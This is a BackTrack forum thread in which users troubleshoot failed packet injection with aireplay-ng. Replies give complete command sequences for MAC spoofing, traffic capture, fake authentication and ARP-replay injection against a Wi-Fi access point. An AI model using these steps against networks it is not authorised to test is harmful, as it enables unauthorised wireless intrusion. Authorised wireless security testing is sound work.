Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: Aireplay-ng problem (can't inject)

  1. #1
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    3

    Default Aireplay-ng problem (can't inject)

    everything goes find until i do ...

    aireplay-ng -1 20 -a (AP MAC) -h (MyMac) wlan0

    then i get this ...

    21:21:01 Sending Authentication Request (Open System)

    21:21:03 Sending Authentication Request (Open System)

    21:21:05 Sending Authentication Request (Open System)

    21:21:07 Sending Authentication Request (Open System)

    21:21:09 Sending Authentication Request (Open System)

    21:21:11 Sending Authentication Request (Open System)

    21:21:13 Sending Authentication Request (Open System)

    21:21:15 Sending Authentication Request (Open System)
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.



    ***

    I tried almost everything here ..

    the MAC address filtering is NOT enabled
    my chipset is = Ralink
    and driver is = RT61

    i am using back-track 3.0


    any advise ? thanks in advance

  2. #2
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    9

    Default

    Quote Originally Posted by Snap4050 View Post
    everything goes find until i do ...

    aireplay-ng -1 20 -a (AP MAC) -h (MyMac) wlan0

    then i get this ...

    21:21:01 Sending Authentication Request (Open System)

    21:21:03 Sending Authentication Request (Open System)

    21:21:05 Sending Authentication Request (Open System)

    21:21:07 Sending Authentication Request (Open System)

    21:21:09 Sending Authentication Request (Open System)

    21:21:11 Sending Authentication Request (Open System)

    21:21:13 Sending Authentication Request (Open System)

    21:21:15 Sending Authentication Request (Open System)
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.



    ***

    I tried almost everything here ..

    the MAC address filtering is NOT enabled
    my chipset is = Ralink
    and driver is = RT61

    i am using back-track 3.0


    any advise ? thanks in advance
    Here's a little snip from the aireplay-ng page which helps me when that happens:
    The lack of association with the access point is the single biggest reason why injection fails.

    To associate with an access point, use fake authentication:

    aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

    Where:

    *
    -1 means fake authentication
    *
    0 reassociation timing in seconds
    *
    -e teddy is the wireless network name
    *
    -a 00:14:6C:7E:40:80 is the access point MAC address
    *
    -h 00:09:5B:EC:EE:F2 is our card MAC addresss
    *
    ath0 is the wireless interface name

    Success looks like:

    18:18:20 Sending Authentication Request
    18:18:20 Authentication successful
    18:18:20 Sending Association Request
    18:18:20 Association successful :-)

    Or another variation for picky access points:

    aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0
    Do a search on the fake auth from their website to find what I've just posted.

  3. #3
    Senior Member secure_it's Avatar
    Join Date
    Feb 2010
    Location
    在這兩者之間 BackTrack是4 FwdTrack4
    Posts
    854

    Default

    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.
    your output is saying everything.Learn basic wireless concepts first rather then going straight for pen-testing.the output is showing that AP is far away.you will have to decrease rate limit.set it using

    iwconfig rausb0 rate 1M (if AP is far)
    iwconfig rausb0 rate 54M(if AP is near)

    By the way we would be glad to know that if you are penetrating your 0wn AP or your neighbor's AP?

  4. #4
    Just burned his ISO spiaire's Avatar
    Join Date
    Aug 2008
    Posts
    17

    Default

    Quote Originally Posted by secure_it View Post
    By the way we would be glad to know that if you are penetrating your 0wn AP or your neighbor's AP?
    ...

    I tried almost everything here ..

    the MAC address filtering is NOT enabled
    ...


    i'm all for busting someone when they tell you that they are breaking the law (hell, even for hinting it). but i'm fairly sure from the quote above that you're off-base here...no sense breaking out the cannons, i'm betting snap4050 did the right thing. i think i'm with leaferz on this one.

    ~s
    <sig>random, witty quote</sig>

  5. #5
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    7

    Default

    im having the same problem and im sitting next to my access pointso its not a speed issue, mac filtering is disabled and still getting the
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.

    its driving me mad i have an atheros wireless chipset which i put in mon mode with out a problem. i must admit im not sure what it means when i look at say wifi0 it also has ath0 and ath1 and says something about VAT im assuming the wireless card creates virtual controllers but am not to sure if anyone can help me with this problem i would be very greatful.

  6. #6
    Junior Member
    Join Date
    Sep 2007
    Posts
    81

    Default

    Quote Originally Posted by Darkcode View Post
    im having the same problem and im sitting next to my access pointso its not a speed issue, mac filtering is disabled and still getting the
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.

    its driving me mad i have an atheros wireless chipset which i put in mon mode with out a problem. i must admit im not sure what it means when i look at say wifi0 it also has ath0 and ath1 and says something about VAT im assuming the wireless card creates virtual controllers but am not to sure if anyone can help me with this problem i would be very greatful.
    try this, hope it helps.

    scan with this

    wlanconfig ath0 destroy
    wlanconfig ath0 create wlandev wifi0 wlanmode monitor
    macchanger -m 00:11:22:33:44:55 ath0
    ifconfig ath0 up
    airodump-ng ath0

    before nexst step reset card with this

    ifconfig ath0 down
    ifconfig ath1 down
    ifconfig ath2 down
    ifconfig ath3 down
    ifconfig wifi0 down
    airmon-ng stop ath0
    airmon-ng stop ath1
    airmon-ng stop ath2
    airmon-ng stop ath3
    wlanconfig ath0 destroy
    wlanconfig ath1 destroy
    wlanconfig ath2 destroy
    wlanconfig ath3 destroy
    wlanconfig ath0 create wlandev wifi0 wlanmode managed
    macchanger -m 00:11:22:33:44:55 ath0
    ifconfig ath0 up

    and start your attack with this

    airmon-ng stop ath0
    airmon-ng start wifi0 3
    airodump-ng -c 3 -w micked --bssid 00:11:50:45:F9:54 ath0

    aireplay-ng -1 0 -e Huston -h 00:11:22:33:44:55 -a 00:11:50:45:F9:54 ath0

    aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:11:50:45:F9:54 -x 330 ath0

  7. #7
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    7

    Default

    Micked Thanks mate seemed to work fine i might not go balled after all can u explain why it has to be done like this

  8. #8
    Junior Member
    Join Date
    Sep 2007
    Posts
    81

    Default

    I think you have some kind of explanation here:

    http://n00bhacker.blogspot.com/2008/...ards-into.html

    some more info from aircrack-ng site:

    http://www.aircrack-ng.org/doku.php?id=airmon-ng


    glad it worked out for you

  9. #9
    Just burned his ISO
    Join Date
    Aug 2007
    Posts
    7

    Default

    awsome stuff mate thanks

  10. #10
    Junior Member
    Join Date
    Jul 2008
    Posts
    63

    Default

    Quote Originally Posted by secure_it View Post
    you will have to decrease rate limit.set it using

    iwconfig rausb0 rate 1M (if AP is far)
    iwconfig rausb0 rate 54M(if AP is near)
    Is this way to do better than just letting the card to choose the rate for far AP with the auto mode as set by default ?

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •